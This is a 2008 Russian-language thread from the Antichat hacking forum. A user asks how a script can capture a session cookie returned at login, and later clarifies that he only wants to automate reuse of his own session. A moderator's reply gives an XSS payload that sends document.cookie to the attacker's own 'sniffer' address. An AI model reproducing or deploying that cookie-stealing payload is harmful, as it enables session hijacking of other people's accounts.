Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Снова о куке!!! При авторизации сервер ее дает, как сохр... |

06.07.2008, 15:10
|
UID: 60130
USER: rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме: 644324
Репутация:
11
|
|
Снова о куке!!! При авторизации сервер ее дает, как сохр...
Снова вопрос о куке!
Есть сервер X, при авторизации он передает куку... так вот, какой скрипт может перехватить переданную им (сервером X) куку??
|
|
|

06.07.2008, 15:12
|
UID: 60351
USER: Ильич
Banned
Регистрация: 05.07.2008
Сообщений: 16
Провел на форуме: 23890
Репутация:
8
|
|
никакой
|
|
|

06.07.2008, 15:27
|
UID: 32695
USER: Kusto
Moderator - Level 7
Регистрация: 04.02.2007
Сообщений: 554
Провел на форуме: 7518056
Репутация:
1089
|
|
блин все так туманно расписанно- непойму ты XSS нашел а как ей воспользоваться незнаеш? я правильно понял?, ну для начала тебе снифер нужен ну а потом попробуй вставить что то наподобие (script)img=new Image();img.src="адрес твоего снифера"+document.cookie;(/script)
P.S. единственное замени ) на > ну и обратную скобку на < в словах script
|
|
|

06.07.2008, 15:42
|
UID: 60130
USER: rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме: 644324
Репутация:
11
|
|
Да не)))
Я написал скрипт (назовем его My_script), который передает пост запрос с обязательной кукой, в которой содержится сессия. Эта сессия на 2 часа, далее идет логаут... сессия уже не действительна. Необходимо снова логинится и забивать в скрипт My_script данные куки... я хочу чтобы новую куку брал скрипт...
|
|
|

06.07.2008, 15:46
|
UID: 60130
USER: rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме: 644324
Репутация:
11
|
|
post запрос с логин\паролем скрипту www.chuzoy_site.py/LOGIN.PHP ... он дает ответ, в котором кука... нужно ее сохранить
|
|
|

06.07.2008, 16:01
|
UID: 42456
USER: -Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме: 3250478
Репутация:
999
|
|
используй /dev/head/
в гугле поищи...
хорошая вещь...
|
|
|

06.07.2008, 16:16
|
UID: 60130
USER: rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме: 644324
Репутация:
11
|
|
Мм... -Hormold-, я не профи)) подробней бы 
и у мну нет никса... одни окна... (на домашнем хочу..)
|
|
|

06.07.2008, 16:19
|
UID: 60351
USER: Ильич
Banned
Регистрация: 05.07.2008
Сообщений: 16
Провел на форуме: 23890
Репутация:
8
|
|
|
|
|

06.07.2008, 16:45
|
UID: 60130
USER: rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме: 644324
Репутация:
11
|
|
Ну так как?? Опять будете до последнего молчать??!?!?
|
|
|

07.07.2008, 01:52
|
UID: 60130
USER: rcc0023
Участник форума
Регистрация: 03.07.2008
Сообщений: 177
Провел на форуме: 644324
Репутация:
11
|
|
Ну ответьте.. какой скрипт это может проделать?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|